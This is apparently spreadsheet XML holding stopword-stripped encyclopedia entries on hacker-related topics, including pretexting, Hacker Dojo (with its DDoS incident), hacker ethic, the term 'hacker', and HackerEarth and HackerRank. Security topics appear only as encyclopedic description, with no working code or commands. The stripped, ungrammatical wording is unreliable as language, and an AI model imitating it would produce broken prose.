pretexter using false pretenses either consumer's address consumer's bank, consumer disclose name bank, would covered. determining principle pretexting occurs information obtained false pretenses. while sale cell telephone records gained significant media attention, telecommunications records focus bills currently united states senate, many types private records bought sold public market. alongside many advertisements cell phone records, wireline records records associated calling cards advertised. individuals shift voip telephones, safe assume records offered sale well. currently, legal sell telephone records, illegal obtain them. source information specialists u.s. rep. fred upton (r-kalamazoo, michigan), chairman energy commerce subcommittee telecommunications internet, expressed concern easy access personal mobile phone records internet house energy commerce committee hearing "phone records sale: aren't phone records safe from pretexting?" illinois became first state online records broker attorney general lisa madigan sued source information specialists, inc. spokeswoman madigan's office said. florida-based company operates several sites sell mobile telephone records, according copy suit. attorneys general florida missouri quickly followed madigan's lead, filing suits respectively, source information specialists and, missouri's case, records broker first data solutions, inc. several wireless providers, including t-mobile, verizon, cingular filed earlier lawsuits records brokers, cingular winning injunction first data solutions source information specialists. u.s. senator charles schumer (d-new york) introduced legislation february 2006 aimed curbing practice. consumer telephone records protection 2006 would create felony criminal penalties stealing selling records mobile phone, landline, voice internet protocol (voip) subscribers. hewlett packard patricia dunn, former chairwoman hewlett packard, reported board hired private investigation company delve responsible leaks within board. dunn acknowledged company used practice pretexting solicit telephone records board members journalists. chairman dunn later apologized offered step board desired board members. unlike federal law, california specifically forbids pretexting. four felony charges brought dunn dismissed. preventive measures taking precautions reduces risk victim social engineering frauds. precautions made follows: aware offers seem "too good true". multifactor authentication. avoid clicking attachments unknown sources. giving personal financial information (such credit card information, social security numbers, bank account information) anyone email, phone, text messages. spam filter software. avoid befriending people know real life. teach kids contact trusted adult case bullied internet (cyberbullying) feel threatened anything online. don't make instant decisions, possible take minutes evaluate information presented. also certified social engineering prevention specialist (cseps) code shikara computer worm confidence trick attempt defraud person group first gaining confidence countermeasure (computer) process reduce security threat cyber-humint skills used cyberspace hackers cyberheist inoculation theory people's attitudes resist change weak counterargument exposures internet security awareness training risk risk related information technology media pranks, often similar tactics (though usually criminal purposes) penetration test method evaluating computer network security simulating cyber attack phishing attempt trick person revealing information physical information security common ground physical information security piggybacking (security) phishing threat (computer) voice phishing phishing attack telephony vulnerability (computing) exploitable weakness computer system cyber security awareness references further reading external links social engineering fundamentals securityfocus.com. retrieved august 2009. "social engineering, way". light reading inc. june 2006. archived original july 2006. retrieved april 2014. should social engineering part penetration testing? darknet.org.uk. retrieved august 2009. "protecting consumers' phone records", electronic privacy information center committee commerce, science, transportation. retrieved february 2006. plotkin, hal. memo press: pretexting already illegal. retrieved september 2006.</t>
  </si>
  <si>
    <t>Hacker Culture</t>
  </si>
  <si>
    <t>hacker culture cultural criticism book written douglas thomas deals hacker ethics hackers. reception publishers weekly reviewed hacker culture intelligent approachable book widely discussed least understood subcultures recent decades."san francisco chronicle reviewed hacker culture unusually balanced history computer underground sensational representation movies newspapers." references external links university minnesota press</t>
  </si>
  <si>
    <t>Hacker Dojo</t>
  </si>
  <si>
    <t>hacker dojo 6,000-square-foot (560 community center hackerspace based mountain view, california. predominantly open working space software projects, dojo hosts range events technology classes biology, computer hardware, manufacturing open types hackers. organization dojo mostly democratically membership oversight five elected directors. anybody become member, hardship, worktrade family rates available. member votes rarely deal specific instances, work general policy dojo run. dojo primarily financed membership dues ($125/mo), historically accepted party sponsorships microsoft, google, isocket, twilio, dataserfs, palantir technologies fund expansions renovations. culture dojo entirely communal space tools electronics desks. anything left considered fair game anybody play with. very restrictions placed upon people provided detract experience members consume resources replace. member event, event organizers permitted charge non-members attendance event. members always permitted everywhere wish, provided consume somebody else's finite resources (such event's food). physical space hacker dojo originally located south whisman road mountain view, facility started 140a space expanded include 140b october 2009, expanded october 2011 lease units thus taking entirety whisman. expansion party attended several hundred individuals, including steven levy. because zoning violations, city mountain view blocked units restricted units events larger occupants., 140a formerly industrial artistic glassworking facility, though community space significant series renovations. order raise money help meet building code requirements, dojo staged "underwear run," saint patrick's fund raiser.construction bids bring south whisman space building code requirements came much higher expected, monday, october 2012, dojo signed lease rent building fairchild drive, also mountain view. move-in occurred february 2013, ribbon-cutting ceremony held february 2013 lease building fairchild drive 2016, time dojo moved third home, located 3350 thomas road santa clara. hacker dojo fourth iteration returns back founding city 2022. controversies distributed denial service attack members hacker dojo could access internet several outages occurring june july 2013. problem eventually traced amplified distributed denial-of-service attack (ddos) attack. case, perpetrator sending forged domain name service (dns) requests multiple domain name servers, causing servers send large amounts data records hacker dojo, thereby overloading system preventing legitimate network. dojo managers made several attempts stop attacks, unsuccessful. eventually, requested help federal bureau investigation (fbi), determined outages result criminal jason david miller, former dojo member.according indictment, miller become member 2013, using first name "ad" last name "min," username became "ad.min" email address "ad.min@hackerdojo.com." dojo management forbids misleading usernames, terminated email account. june 2013, miller re-registered "dallas smith," began attacking dojo's internet service weeks later, starting june 2013. charged violation title u.s.c. 1030(a)(5)(a) (c)(4)(b)(i)—intentionally causing damage protected computer. miller indicted 2014.miller claims intended engage harmless prank. teaching assistant, researcher, eagle scout. scheduled sentenced october 2016, courtroom judge edward davila jose. embezzlement march, 2016, local newspaper published article saying dojo facing leadership crisis employee accused embezzlement. since 2016, organization major overhaul leadership board members bringing back founding team super happy house. organization currently holds platinum badge transparency guidestar. https://www.guidestar.org/profile/26-4812213 uses three primary uses hacker dojo events, coworking space, social purposes. events 140b building turned place events random hacks kindness, startup weekend, baythreat among others hosted. also invented events reverse fair call hacker fair candidates present booths previous independent open source work company engineers accompanied technical recruiters startup fair, young companies booths investors consider. members hold events dojo free charge, subject approval dojo events committee. coworking large number silicon valley startups work daily hacker dojo primary location, founders institute, located nearby, encourages members work dojo notable startups with hacker dojo history pinterest—the founders built first iteration product hacker dojo word lens—acquired google pebble watches infometers.com—acquired validic.com skydera networkedblogs game closure chivaz socks micromobs, wedding party cirroscope (then cirrosecure), acquired palo alto networks social dojo movie nights, weekly happy hour, friday night socials. dojo 2022 original dojo references external links "the official hacker dojo google group" "peninsula hackers find place collaborate mountain view". mercury news. august 2009 "hacker dojo mountain view sparks ideas tinkering". mercury news. october 2009 case hacker dojo". 248creative.com. february 2010. "techies work hacker dojo" wall street journal. 3/9/2011. hacker dojo, silicon valley techies build toward success". cnet news.com. april 2011. "the stanford igniters meetup month hacker dojo"</t>
  </si>
  <si>
    <t>HackNY</t>
  </si>
  <si>
    <t>hackny york city-based initiative seeking create empower community student-technologists." hackny created 2010 evan korth, hilary mason, chris wiggins. organization organized faculty york university columbia university. hackny holds semiannual, 24-hour "hackathons," runs summer fellows program pairs students computational sciences local startup companies.each semester, hackny holds 24-hour coding marathon, "hackathon," often york university's courant institute mathematical sciences, spring 2013 columbia's engineering school. events open students, columbia nyu. hackathons begin brief presentations startups make apis available participants. students encouraged, though required, work together come creative solutions build features time runs out. hackathons conclude presentation students' work, judging.hackny organizes summer program pairs quantitative computational students startup companies. list startups hosted students previous years found here. students compensated, receive free housing, attend lecture series showing like join, found, startup company. notable alumni abraham stanway (2011), cofounder amperon. references external links www.hackny.org computer geeks king hunt video role hackny market. cnnmoney, 2012.</t>
  </si>
  <si>
    <t>Hacker Halted</t>
  </si>
  <si>
    <t>hacker halted global series computer information security conferences presented ec-council. objective hacker halted conferences raise international awareness towards increased education ethics security. event currently 14th year. also present hacker halted ec-council's h@cker halted academy, trainings workshops ec-council instructors trainers. past conferences hacker halted india hacker halted malaysia held 2004, 2007, 2018 delhi hacker halted egypt 2010 hacker halted conference held egypt december 2018 hacker halted india hacker halted dubai held 2005 2006 dubai, united hacker halted singapore hacker halted singapore held 2005 singapore. hacker halted mexico hacker halted mexico held 2005 mexico. hacker halted japan hacker halted japan held november 2008 tokyo, japan. hacker halted hacker halted held 2008 myrtle beach, south carolina hacker halted held september 20–24, 2009 miami, florida, hilton head hotel, include events include "capture flag" event.hacker halted held 2010 miami. hacker halted held miami october 2011. theme 2011 "stop data leaks. secure code". hacker halted held miami october 29–31, 2012. hacker halted held atlanta 2013, 2014, 2015, 2016, 2017, 2018. upcoming conferences hacker halted 2019 returns atlanta, conference tracks some talks include tracks include: certified ethical hacker (ceh) incident response computer forensics threats counter measures governance, policies standards business continuity disaster recovery mobile security virtualization security secure programming malware botnets social engineering physical security h@cker halted academy hacker halted 2009 launch hacker halted academy. hacker halted academy series classes presented ec-council partners. many classes include ec-council training certification, including certified ethical hacker licensed penetration tester, well vendor specific certification, including, certified information systems security professional(cissp) information security assessment methodology(iam)/information security evaluation methodology(iem) training. also ec-council hacker conference references external links hacker halted website hacker halted academy hacker halted egypt website</t>
  </si>
  <si>
    <t>Hacker ethic</t>
  </si>
  <si>
    <t>hacker ethic philosophy moral values common within hacker culture. practitioners hacker ethic believe sharing information data others ethical imperative. hacker ethic related concept freedom information, well political theories anti-authoritarianism, socialism, liberalism, anarchism, libertarianism.while tenets hacker ethic described texts like computer lib/dream machines (1974) nelson, term hacker ethic generally attributed journalist steven levy, appears first document philosophy founders philosophy 1984 book titled hackers: heroes computer revolution. history hacker ethic originated massachusetts institute technology 1950s–1960s. term "hacker" long used describe college pranks students would regularly devise, used generally describe project undertaken product built fulfill constructive goal, also pleasure mere involvement.mit housed early computer inside electronic accounting machinery (eam) room 1959. this room became staging grounds early hackers, students tech model railroad club snuck inside room hours attempt programming 30-ton, 9-foot-tall (2.7 computer. hacker ethic described "new life, philosophy, ethic dream". however, elements hacker ethic openly debated discussed; rather implicitly accepted silently agreed upon.the free software movement born early 1980s followers hacker ethic. founder, richard stallman, referred steven levy "the last true hacker".richard stallman describes: "the hacker ethic refers feelings right wrong, ethical ideas community people had—that knowledge shared people benefit important resources utilized rather wasted." states precisely hacking (which stallman defines playful cleverness) ethics separate issues: "just someone enjoys hacking mean ethical commitment treating people properly. some hackers care ethics—i instance—but part hacker, separate trait. [...] hacking primarily ethical issue. [...] hacking tends lead significant number hackers think ethical questions certain way. would want completely deny connection hacking views ethics."the hacker culture compared early protestantism. protestant sectarians emphasized individualism loneliness, similar hackers considered loners nonjudgmental individuals. notion moral indifference hackers characterized persistent actions computer culture 1970s early 1980s. according kirkpatrick, author hacker ethic, "computer plays role god, whose requirements took priority human ones sentiment came assessing one's duty others." according kirkpatrick's hacker ethic: "exceptional single-mindedness determination keep plugging away problem optimal solution found well-documented traits early hackers. willingness work right night single programming problem widely cited features early 'hacker' computer culture." hacker culture placed context 1960s youth culture american youth culture challenged concept capitalism big, centralized structures. hacker culture subculture within 1960s counterculture. hackers' main concern challenging idea technological expertise authority. 1960s hippy period attempted "overturn machine." although hackers appreciated technology, wanted regular citizens, corporations, power technology weapon might actually undermine authority expert hold monolithic system." hacker ethics levy summarized preface hackers, general tenets principles hacker ethic include: sharing openness decentralization free access computers world improvement (foremost, upholding democracy fundamental laws live society)in addition principles, levy also described specific hacker ethics beliefs chapter hacker ethic: ethics described chapter are: "access computers—and anything might teach something world works—should unlimited total. always yield hands-on imperative!" levy recounting hackers' abilities learn build upon pre-existing ideas systems. believes access gives hackers opportunity take things apart, fix, improve upon learn understand work. this gives knowledge create even interesting things. access aids expansion technology. "all information free" linking directly principle access, information needs free hackers fix, improve, reinvent systems. free exchange information allows greater overall creativity. hacker viewpoint, system could benefit easy flow information, concept known transparency social sciences. stallman notes, "free" refers unrestricted access; refer price. "mistrust authority—promote decentralization" best promote free exchange information open system presents boundaries hacker piece information item equipment need quest knowledge, improvement, time on-line. hackers believe bureaucracies, whether corporate, government, university, flawed systems. "hackers judged hacking, bogus criteria degrees, age, race, sex, position" inherent hacker ethic meritocratic system superficiality disregarded esteem skill. levy articulates criteria age, sex, race, position, qualification deemed irrelevant within hacker community. hacker skill ultimate determinant acceptance. such code within hacker community fosters advance hacking software development. "you create beauty computer" hackers deeply appreciate innovative techniques allow programs perform complicated tasks instructions. program's code considered hold beauty own, carefully composed artfully arranged. learning create programs used least amount space almost became game early hackers. "computers change life better" hackers felt computers enriched lives, given lives focus, made lives adventurous. hackers regarded computers aladdin's lamps could control. they believed everyone society could benefit experiencing power everyone could interact computers hackers did, hacker ethic might spread society computers would improve world. hackers succeeded turning dreams endless possibilities realities. hacker's primary object teach society "the world opened computer limitless one" (levy 230:1984) sharing from early days modern computing 1970s, common computer users freedoms provided ethic open sharing collaboration. software, including source code, commonly shared individuals used computers. most companies business model based hardware sales, provided bundled associated software free charge. according levy's account, sharing norm expected within non-corporate hacker culture. principle sharing stemmed open atmosphere informal access resources mit. during early days computers programming, hackers would develop program share computer users. hack deemed particularly good, program might posted board somewhere near computers. other programs could built upon improved saved tapes added drawer programs, readily accessible hackers. time, fellow hacker might reach drawer, pick program, begin adding "bumming" make better. bumming referred process making code concise done fewer instructions, saving precious memory enhancements. second generation hackers, sharing sharing general public addition sharing hackers. particular organization hackers concerned sharing computers general public group called community memory. this group hackers idealists computers public places anyone use. first community computer placed outside leopold's records berkeley, california. another sharing resources occurred albrecht provided considerable resources non-profit organization called people's computer company (pcc). opened computer center anyone could computers fifty cents hour. this second generation practice sharing contributed battles free open software. fact, bill gates' version basic altair shared among hacker community, gates claimed lost considerable money users paid software. result, gates wrote open letter hobbyists. this letter published several computer magazines newsletters, notably homebrew computer club much sharing occurred. according brent jesiek "democratizing software: open source, hacker ethic, beyond," technology associated social views goals. jesiek refers gisle hannemyr's views open source commercialized software. hannemyr concludes hacker constructs software, software flexible, tailorable, modular nature open-ended. hacker's software contrasts mainstream hardware favors control, sense whole, immutable (hannemyr, 1999). furthermore, concludes 'the difference hacker’s approach industrial programmer outlook: agoric, integrated holistic attitude towards creation artifacts proprietary, fragmented reductionist one' (hannemyr, 1999). hannemyr’s analysis reveals, characteristics given piece software frequently reflect attitude outlook programmers organizations emerges." copyright patents copyright patent laws limit ability share software, opposition software patents widespread hacker free software community. hands-on imperative many principles tenets hacker ethic contribute common goal: hands-on imperative. levy described chapter "hackers believe essential lessons learned systems—about world—from taking things apart, seeing work, using knowledge create interesting things."employing hands-on imperative requires free access, open information, sharing knowledge. true hacker, hands-on imperative restricted, ends justify means make unrestricted improvements made. when principles present, hackers tend work around them. example, computers protected either physical locks login programs, hackers systematically worked around order access machines. hackers assumed "willful blindness" pursuit perfection.this behavior malicious nature: hackers seek harm systems users. this deeply contrasts modern, media-encouraged image hackers crack secure systems order steal information complete cyber-vandalism. community collaboration throughout writings hackers work processes, common value community collaboration present. example, levy's hackers, generation hackers geographically based communities collaboration sharing occurred. hackers mit, labs computers running. hardware hackers (second generation) game hackers (third generation) geographic area centered silicon valley homebrew computer club people's computer company helped hackers network, collaborate, share work. concept community collaboration still relevant today, although hackers longer limited collaboration geographic regions. collaboration takes place internet. eric raymond identifies explains conceptual shift cathedral bazaar: before cheap internet, geographically compact communities culture encouraged weinberg's egoless programming, developer could easily attract skilled kibitzers co-developers. bell labs, labs, berkeley: became home innovations legendary still potent. raymond also notes success linux coincided wide availability world wide web. value community still high practice today. levy's "true hackers" levy identifies several "true hackers" significantly influenced hacker ethic. some well-known "true hackers" include: bill gosper: mathematician hacker richard greenblatt: programmer early designer lisp machines john mccarthy: co-founder artificial intelligence stanford laboratory jude milhon: founder cypherpunk movement, senior editor mondo 2000, co-founder community memory richard stallman: programmer political activist well known gnu, emacs free software movementlevy also identified "hardware hackers" (the "second generation", mostly centered silicon valley) "game hackers" "third generation"). three generations hackers, according levy, embodied principles hacker ethic. some levy's "second-generation" hackers include: steve dompier: homebrew computer club member hacker worked early altair 8800 john draper: legendary figure computer programming world. wrote easywriter, first word processor. felsenstein: hardware hacker co-founder community memory homebrew computer club; designer sol-20 computer marsh: designer sol-20 computer fred moore: activist founder homebrew computer club steve wozniak: founders apple computerlevy's "third generation" practitioners hacker ethic include: john harris: first programmers hired on-line systems (which later became sierra entertainment) williams: along wife roberta, founded on-line systems working company would later achieve mainstream popularity sierra other descriptions 2001, finnish philosopher pekka himanen promoted hacker ethic opposition protestant work ethic. himanen's opinion, hacker ethic closely related virtue ethics found writings plato aristotle. himanen explained ideas book, hacker ethic spirit information age, prologue contributed linus torvalds epilogue manuel castells. manifesto, authors wrote hacker ethic centering passion, hard work, creativity creating software. both himanen torvalds inspired sampo finnish mythology. sampo, described kalevala saga, magical artifact constructed ilmarinen, blacksmith god, brought good fortune holder; nobody knows exactly supposed sampo interpreted many ways: world pillar world tree, compass astrolabe, chest containing treasure, byzantine coin die, decorated vendel period shield, christian relic, etc. kalevala saga compiler lönnrot interpreted "quern" mill sort made flour, salt, wealth. also hacks massachusetts institute technology hacker (programmer subculture) hacker (term) hacktivism tech model railroad club cathedral bazaar free software movement free software philosophy footnotes references himanen, pekka (2001). hacker ethic spirit information age. york: random house. isbn 978-0375505669. oclc 45393052. levy, steven (2001). hackers: heroes computer revolution (updated ed.). york: penguin books. isbn 978-0141000510. oclc 47216793. further reading weinberg, gerald (1998–2001). psychology computer programming (silver anniversary ed.). york: dorset house publ. isbn 978-0-932633-42-2. external links gabriella coleman, anthropologist mcgill university, studies hacker cultures written extensively hacker ethic culture chance's essay hacker ethic meaningful work hacker ethic jargon file directory free software iterative discourse formation subcultures steve mizrach describes hacker terminology, including term cracker. richard stallman's personal website hacker ethic hackers? steven mizrach hacker's ethics cyberpunk project</t>
  </si>
  <si>
    <t>Hacker group</t>
  </si>
  <si>
    <t>hacker groups informal communities began flourish early 1980s, advent home computer. overview prior time, term hacker simply referral computer hobbyist. hacker groups make names themselves, often spurred press. this heyday hacking, time much computer crime. hacker groups provided access information resources, place learn members. hackers could also gain credibility affiliated elite group. names hacker groups often parody large corporations, governments, police criminals; often used specialized orthography. also list hacker groups references</t>
  </si>
  <si>
    <t>Hacker</t>
  </si>
  <si>
    <t>hacker person skilled information technology uses technical knowledge achieve goal overcome obstacle, within computerized system non-standard means. though term hacker become associated popular culture security hacker someone utilizes technical know-how bugs exploits break computer systems access data would otherwise inaccessible hacking also utilized legitimate figures legal situations. example, enforcement agencies sometimes hacking techniques order collect evidence criminals malicious actors. this could include using anonymity tools (such vpn, dark web) mask identities online, posing criminals themselves. likewise, covert world agencies employ hacking techniques legal conduct work. hand, hacking cyber-attacks used extra- illegally enforcement security agencies (conducting warrantless activities), employed state actors weapon legal illegal warfare. definitions general definition reflecting types hackers, definitions word "hacker": originally, hacker simply meant advanced computer technology enthusiast (both hardware software) adherent programming subculture; hacker culture. someone able subvert computer security. malicious purposes, person also called cracker.today, mainstream usage "hacker" mostly refers computer criminals, mass media usage word since 1990s. this includes hacker slang calls "script kiddies", people breaking computers using programs written others, little knowledge work. this usage become predominant general public largely unaware different meanings exist. while self-designation hobbyists hackers generally acknowledged accepted computer security hackers, people programming subculture consider computer intrusion related usage incorrect, emphasize difference calling security breakers "crackers" (analogous safecracker). controversy usually based assertion term originally meant someone messing something positive sense, using playful cleverness achieve goal. then, supposed, meaning term shifted decades came refer computer criminals.as security-related usage spread widely, original meaning become less known. popular usage media, "computer intruders" "computer criminals" exclusive meaning word today. (for example, internet 'hacker' broke state government security systems march.") computer enthusiast (hacker culture) community, primary meaning complimentary description particularly brilliant programmer technical expert. (for example, "linus torvalds, creator linux, considered hacker.") large segment technical community insist latter "correct" usage word (see jargon file definition below). representation mainstream media mainstream media's current usage term traced back early 1980s. when term, previously used among computer enthusiasts, introduced wider society mainstream media 1983, even computer community referred computer intrusion "hacking", although exclusive definition word. reaction increasing media term exclusively criminal connotation, computer community began differentiate terminology. alternative terms "cracker" coined effort maintain distinction "hackers" within legitimate programmer community performing computer break-ins. further terms "black hat", "white hat" "gray hat" developed laws breaking computers came effect, distinguish criminal activities activities legal. representation network news however, network news term consistently pertained primarily criminal activities, despite attempt technical community preserve distinguish original meaning, today mainstream media general public continue describe computer criminals, levels technical sophistication, "hackers" generally make word non-criminal connotations. members media sometimes seem unaware distinction, grouping legitimate "hackers" linus torvalds steve wozniak along criminal "crackers".as result, definition still subject heated controversy. wider dominance pejorative connotation resented many object term taken cultural jargon used negatively, including historically preferred self-identify hackers. many advocate using recent nuanced alternate terms describing criminals others negatively take advantage security flaws software hardware. others prefer follow common popular usage, arguing positive form confusing unlikely become widespread general public. minority still term senses despite controversy, leaving context clarify leave ambiguous) meaning intended. however, positive definition hacker widely used predominant form many years negative definition popularized, "hacker" therefore seen shibboleth, identifying technically-oriented sense opposed exclusively intrusion-oriented sense) members computing community. hand, variety industries software designers find many prefer referred hackers word holds negative denotation many industries. possible middle ground position suggested, based observation "hacking" describes collection skills tools used hackers descriptions differing reasons. analogy made locksmithing, specifically picking locks, skill used good evil. primary weakness analogy inclusion script kiddies popular usage "hacker," despite lack underlying skill knowledge base. sometimes, "hacker" simply used synonymously "geek": true hacker group person. he's person loves stay night, machine love-hate relationship... they're kids tended brilliant interested conventional goals it's term derision also ultimate compliment."fred shapiro thinks "the common theory 'hacker' originally benign term malicious connotations word later perversion untrue." found malicious connotations already present 1963 (quoting tech, student newspaper), time referred unauthorized users telephone network, phreaker movement developed computer security hacker subculture today. hacker culture hacker culture idea derived community enthusiast computer programmers systems designers 1960s around massachusetts institute technology's (mit's) tech model railroad club (tmrc) artificial intelligence laboratory. concept expanded hobbyist home computing community, focusing hardware late 1970s (e.g. homebrew computer club) software (video games, software cracking, demoscene) 1980s/1990s. later, would encompass many definitions art, life hacking. types security related hacking security hackers people involved circumvention computer security. among security hackers, several types, including: white hacker white hats hackers work keep data safe hackers finding system vulnerabilities mitigated. white hats usually employed target system's owner typically paid (sometimes quite well) work. their work illegal done system owner's consent. black hacker black hats crackers hackers malicious intentions. they often steal, exploit, sell data, usually motivated personal gain. their work usually illegal. cracker like black hacker, specifically someone skilled tries hacking make profits benefit, vandalize. crackers find exploits system vulnerabilities often advantage either selling system owner selling exploit black hackers, turn steal information gain royalties. grey hacker grey computer hacker computer security expert sometimes violate laws typical ethical standards, malicious intent typical black hacker. motives four primary motives proposed possibilities hackers attempt break computers networks. first, criminal financial gain hacking systems specific purpose stealing credit card numbers manipulating banking systems. second, many hackers thrive increasing reputation within hacker subculture leave handles websites defaced leave evidence proof involved specific hack. third, corporate espionage allows companies acquire information products services stolen used leverage within marketplace. lastly, state-sponsored attacks provide nation states wartime intelligence collection options conducted cyberspace. overlaps differences main basic difference programmer subculture computer security hacker mostly separate historical origin development. however, jargon file reports considerable overlap existed early phreaking beginning 1970s. article mit's student paper tech used term hacker context already 1963 pejorative meaning someone messing phone system. overlap quickly started break people joined activity less responsible way. this case publication article exposing activities draper engressia. according raymond, hackers programmer subculture usually work openly real name, computer security hackers prefer secretive groups identity-concealing aliases. also, activities practice largely distinct. former focus creating improving existing infrastructure (especially software environment work with), latter primarily strongly emphasize general circumvention security measures, effective knowledge (which report help fixing security bugs, exploitation reasons) rather secondary. visible difference views design hackers' incompatible timesharing system, deliberately security measures. there subtle overlaps, however, since basic knowledge computer security also common within programmer subculture hackers. example, thompson noted 1983 turing award lecture possible code unix "login" command would accept either intended encrypted password particular known password, allowing backdoor system latter password. named invention "trojan horse". furthermore, thompson argued, compiler could modified automatically generate rogue code, make detecting modification even harder. because compiler program generated compiler, trojan horse could also automatically installed compiler program, without detectable modification source compiler. however, thompson disassociated strictly computer security hackers: would like criticize press handling 'hackers,' gang, dalton gang, etc. acts performed kids vandalism best probably trespass theft worst. watched kids testifying congress. clear completely unaware seriousness acts."the programmer subculture hackers sees secondary circumvention security mechanisms legitimate done practical barriers actual work. special forms, even expression playful cleverness. however, systematic primary engagement activities actual interests programmer subculture hackers significance actual activities, either. difference that, historically, members programmer subculture hackers working academic institutions used computing environment there. contrast, prototypical computer security hacker access exclusively home computer modem. however, since mid-1990s, home computers could unix-like operating systems inexpensive internet home access available first time, many people outside academic world started take part programmer subculture hacking. since mid-1980s, overlaps ideas members computer security hacking community. prominent case robert morris, user mit-ai, wrote morris worm. jargon file hence calls true hacker blundered". nevertheless, members programmer subculture tendency look disassociate overlaps. they commonly refer disparagingly people computer security subculture crackers refuse accept definition hacker encompasses activities. computer security hacking subculture, hand, tends distinguish subcultures harshly, acknowledging much common including many members, political social goals, love learning technology. they restrict term cracker categories script kiddies black hackers instead. three subcultures relations hardware modifications. early days network hacking, phreaks building blue boxes various variants. programmer subculture hackers stories several hardware hacks folklore, mysterious "magic" switch attached pdp-10 computer mit's that, switched off, crashed computer. early hobbyist hackers built home computers construction kits. however, activities died 1980s phone network switched digitally controlled switchboards, causing network hacking shift dialing remote computers modems pre-assembled inexpensive home computers available academic institutions started give individual mass-produced workstation computers scientists instead using central timesharing system. kind widespread hardware modification nowadays case modding. encounter programmer computer security hacker subculture occurred 1980s, group computer security hackers, sympathizing chaos computer club (which disclaimed knowledge activities), broke computers american military organizations academic institutions. they sold data machines soviet secret service, order fund drug addiction. case solved clifford stoll, scientist working system administrator, found ways attacks trace back (with help many others). german film adaption fictional elements, shows events attackers' perspective. stoll described case book cuckoo's documentary kgb, computer, perspective. according eric raymond, "nicely illustrates difference 'hacker' 'cracker'. stoll's portrait himself, lady martha, friends berkeley internet paints marvelously vivid picture hackers people around like live think." also script kiddie, unskilled computer security attacker hacktivism, conducting cyber attacks business organisation order bring social change references further reading computer security free software/open source external links hacking wikibooks dictionary definition hacker wiktionary media related hackers wikimedia commons</t>
  </si>
  <si>
    <t>HackerEarth</t>
  </si>
  <si>
    <t>hackerearth indian software company headquartered francisco, provides enterprise software helps organisations technical hiring needs. hackerearth used organizations technical skill assessment remote video interviewing. addition hackerearth also community since inception built base developers. community, hackerearth known conducted 1000+ hackathons 10,000+ programming challenges date. hackerearth raised $11.5 million funding three rounds. currently, customers worldwide technical coding assessments platform, including amazon, walmart labs, thoughtworks, societe generale, vmware, dbs, hcl, wipro, barclays, pitney bowes, intel, infotech. hackerearth backed global angelprime. history early years founded november 2012 indian institute technology roorkee alumni sachin gupta vivek prakash, hackerearth began journey mycareerstack social interactive platform geared toward technical interviews. initially, learning platform aimed leveling playing field technical interviews campus students tutorials concepts programming, blogs, interview questions, online code editor, discussion forum. later, sachin vivek pivoted idea create automated technical assessment software product launched february 2013. years later, hackerearth launched innovation management software; upgraded version released early 2018. growth funding startup part first batch accelerator 2012, later secured $500,000 early-stage investor prime ventures. bangalore california-based company raised $4.5 million series round group inc. participation prime ventures beenext february 2017. december 2018, hackerearth secured next round funding. series funding hirao office total value $6.5 million. hackerearth raised total $11,500,000 funding three rounds. company headquartered francisco, california, apart offices india china. products services hackerearth assessments hackerearth assessments certified coding assessment platform helps organizations hire developers using automated technical coding tests. proprietary tech assessment platform vets technical talent skill-based evaluation analytics. facecode facecode hackerearth's video interview software hiring developers. remote hiring solutions hackerearth helps organizations source, assess, interview, hire tech talent anywhere developer roles. with help products online hackathons, hackerearth provides remote hiring solutions organizations worldwide. contests hackerearth contests include hackathons, programming challenges, coding competitions developers companies. practice hackerearth practice offers programming tutorials (data structures, algorithms, math, python, machine learning, etc.) practice problems developers. hackerearth student ambassador hackerearth university ambassador program platform students programming club university. awards recognition hackerearth finalist seedstars world startup competition held geneva february 2014. hackerearth india regional competition seedstars, short listed startups. hackerearth appeared nasscom's emerge list 2015. sachin gupta featured 2016 forbes asia (enterprise technology) list. april 2020, hackerearth certified great place work great place work institute. criticism hackerearth allow deletion accounts, merely possible "deactivate" accounts. also devpost references</t>
  </si>
  <si>
    <t>HackerNest</t>
  </si>
  <si>
    <t>hackernest not-for-profit organization global movement founded january 2011. organization unites local technology communities around world community events socially beneficial hackathons mission economic development technological proliferation. canada's largest, prolific technology community growing international reach. background hackernest founded belief fastest, permanent improve world build supportive local technology innovation communities characterized trust, sharing, respect. rationale technology community cornerstone economic development enabling collaboration, innovation, knowledge-sharing, recruiting, scientific progress. growing strengthening community lets businesses hire better, perform better, create jobs, ultimately increases economic prosperity. organization's ideology rooted idea minor tweaks start process dynamic system major impact result. hackernest "splinter cells" (chapters) regularly host "tech socials" open anyone interested technology. events vary slightly city, maintain core tenets: friendly down-to-earth.the first tech social held toronto monday, january 2011. hackernest toronto currently world's largest meetup group programmers canada's largest technologist community.as july 2017, hackernest splinter cells 550+ events cities across countries continents. activities 2014, hackernest produced construct, canada's largest hardware hackathon dementiahack british government, world's first hackathon dedicated helping people dementia caregivers.in 2015, organization produced deloitte's first internal innovation hackathon well dementiahack facebook lead sponsor support government, public health agency canada, ontario ministry health long-term care. 2016, hackernest produced courthack national center state courts salt lake city hack4equality&gt; lgbtq hackathon grindr angeles heavily featured white house promise zone opportunity project data. awards boryana damnyanova award corporate social responsibility tufts university contributions technology community city toronto government finalist canadian global impact competition references external links official website gov.uk british high commission ottawa wall street journal betakit hackernest toronto splinter cell</t>
  </si>
  <si>
    <t>HackerRank</t>
  </si>
  <si>
    <t>hackerrank tech company focuses competitive programming challenges consumers businesses. developers compete trying program according provided specifications. hackerrank's programming challenges solved variety programming languages (including java, c++, php, python, sql, javascript) span multiple computer science domains.on consumer side, programmer submits solution programming challenge, submission scored accuracy output. programmers ranked globally hackerrank leaderboard earn badges based accomplishments drive competition among users. addition individual coding challenges, hackerrank also hosts contests (often referred hackerrank "codesprints") users compete programming challenges period time ranked conclusion event. hackerrank part growing gamification trend within competitive computer programming consumer-side website free coders use. history hackerrank founded interviewstreet inc. trichy alumni vivek ravisankar hari karunanidhi. hackerrank combinator-backed company, first indian company accepted combinator. they also participated techcrunch disrupt 2012, currently venture capital backing khosla ventures battery ventures. funding july 2015, hackerrank received $7.5 million funding japanese firm recruit holdings’ technology fund. february 2018 hackerrank announced raised million series funding, equity. acquisition december 2019, hackerrank acquired mimir, cloud-based service provides tools teaching computer science courses. mimir used google universities including michigan state, ucla, oregon state purdue. mimir hackerrank’s first acquisition. computer science domains hackerrank hackerrank provides developers code many different languages c++, python, java, ruby, swift, many more. hackerrank categorizes programming challenges number core computer science domains, including: database: involves learning management maintenance databases datastructure: involves learning different types available data structures them. mathematics: challenging mathematical problems. artificial intelligence: involves developing bots using others. algorithms: traditional algorithmic challenges. functional programming: functional programming abstractions solve challenges. machine learning: predictive modeling analysis solve challenges. hackerrank work their enterprise-side product, 